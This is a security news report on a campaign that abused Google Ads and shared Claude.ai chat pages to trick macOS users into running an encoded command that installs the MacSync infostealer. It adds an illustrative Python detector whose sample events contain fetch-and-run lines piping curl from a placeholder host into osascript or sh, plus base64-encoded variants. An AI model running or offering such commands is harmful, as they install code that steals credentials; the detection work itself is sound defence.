Hackers Abuse Google Ads and Claude.ai Chat Feature to Trick macOS Users into Installing Infostealer Malware


Tuesday, May 12, 2026

A malvertising campaign has been reported that targets macOS users searching for the desktop Claude application from Anthropic. The attackers bought Google Ads placements and pointed the sponsored results at shared chat pages hosted on the legitimate Claude.ai domain, so the landing page carries the credibility of the real service. The campaign is notable because it borrows the trust of a legitimate AI platform to lower users' suspicion and talk them into running commands that install information-stealing malware.

The chain starts when a user searches for terms such as downloading Claude for Mac and clicks a sponsored result. The ad redirects to a Claude.ai chat page whose content is dressed up as installation instructions from Apple Support. The chat tells the user to copy a command into the macOS Terminal and run it. The command is encoded, so neither its real destination nor its purpose is visible at a glance. When executed, it downloads a script and runs it in memory through osascript, leaving little on disk. Analysis reported that the malware checks the keyboard layout and exits immediately if it finds Russian or other CIS-region settings; otherwise the MacSync malware goes on to harvest browser passwords, cookies and macOS Keychain data and sends them to attacker-controlled servers.

To reduce exposure to this kind of lure, users should avoid clicking sponsored results and instead type Anthropic's official address into the browser when downloading the software. A Terminal command should never be pasted and run unless its function is fully understood, no matter how trustworthy the page that presents it looks. Enterprise defenders can watch process telemetry for the pattern this campaign relies on: curl output, or a base64-decoded blob, piped straight into osascript or a shell interpreter from an interactive Terminal session. Alerting on that combination gives a chance to catch a paste-and-run infection before credential theft occurs.
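The attack chain described above and the monitoring advice in this paragraph both come down to one observable: a command line that fetches or decodes content and hands it to an interpreter. The following is an added example, not code from the article or from BleepingComputer, of a triage script that applies that heuristic to process-execution records. The record shape (user, parent, cmdline), the rule names and the sample events are all constructed for illustration; the example also decodes base64 tokens found in a command line and runs the same rules on the decoded text, which goes slightly beyond the article by covering the "encoded command" step generically rather than for one specific blob.

```python
import base64
import binascii
import re

# Interpreters a pasted command might feed. osascript is included because the
# reported campaign ran its downloaded script through it.
INTERPRETERS = r"(?:osascript|bash|sh|zsh|python3?|perl)"

# Heuristic rules for the paste-and-run pattern. Rule names are illustrative.
RULES = {
    "remote_fetch_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?" + INTERPRETERS + r"\b"),
    "command_substitution_of_remote_fetch": re.compile(
        r"\$\(\s*(?:curl|wget)\b"),
    "base64_decode_piped_to_interpreter": re.compile(
        r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?" + INTERPRETERS + r"\b"),
    "osascript_do_shell_script": re.compile(
        r"osascript\b.*do shell script", re.IGNORECASE),
}

# A run of base64 alphabet long enough to be worth decoding for triage.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _is_text(s):
    return all(c.isprintable() or c in "\n\t\r" for c in s)


def decode_base64_blobs(cmdline):
    """Return the decoded text of every base64-looking token that decodes to printable text."""
    decoded = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(tok, validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary payload: skip for this heuristic
        if _is_text(text):
            decoded.append(text)
    return decoded


def analyze_command(cmdline, depth=0):
    """Return a list of (rule_name, matched_text) findings for one command line.

    One layer of base64-decoded content is scanned as well; findings from the
    decoded text are prefixed with 'decoded:' so an analyst sees where they came from.
    """
    findings = []
    for name, pattern in RULES.items():
        m = pattern.search(cmdline)
        if m:
            findings.append((name, m.group(0)))
    if depth == 0:
        for inner in decode_base64_blobs(cmdline):
            for name, evidence in analyze_command(inner, depth=1):
                findings.append(("decoded:" + name, evidence))
    return findings


def triage_events(events):
    """Return only the events that trip at least one rule, with findings attached."""
    hits = []
    for ev in events:
        findings = analyze_command(ev["cmdline"])
        if findings:
            hits.append({**ev, "findings": findings})
    return hits


# Constructed sample telemetry (hypothetical shape, not real EDR output).
# The first event mimics the campaign's stage one: a base64 blob whose decoded
# form fetches a script and pipes it into osascript. The hostname is a placeholder.
INNER_STAGE = "curl -fsSL https://example.invalid/x.txt | osascript"
ENCODED_STAGE = base64.b64encode(INNER_STAGE.encode()).decode()

SAMPLE_EVENTS = [
    {"user": "alice", "parent": "Terminal",
     "cmdline": f"echo {ENCODED_STAGE} | base64 -D | bash"},
    {"user": "alice", "parent": "Terminal",
     "cmdline": "curl -fsSL https://example.invalid/install.sh | sh"},
    {"user": "bob", "parent": "Terminal",
     "cmdline": "brew update && brew upgrade"},
    {"user": "bob", "parent": "Terminal",
     "cmdline": "curl -O https://example.invalid/report.pdf"},
]

if __name__ == "__main__":
    for hit in triage_events(SAMPLE_EVENTS):
        print(f"{hit['user']} ({hit['parent']}): {hit['cmdline']}")
        for name, evidence in hit["findings"]:
            print(f"    {name}: {evidence!r}")
```

The rules are deliberately narrow: a plain `curl -O` download or a Homebrew update produces no finding, while both the encoded first stage and a direct `curl | sh` do. Decoding base64 tokens before matching matters because the visible command line in the campaign shows only `base64 -D | bash`; the curl-to-osascript step only appears after decoding, which is also what an analyst needs to see to identify the download location.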

Source: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/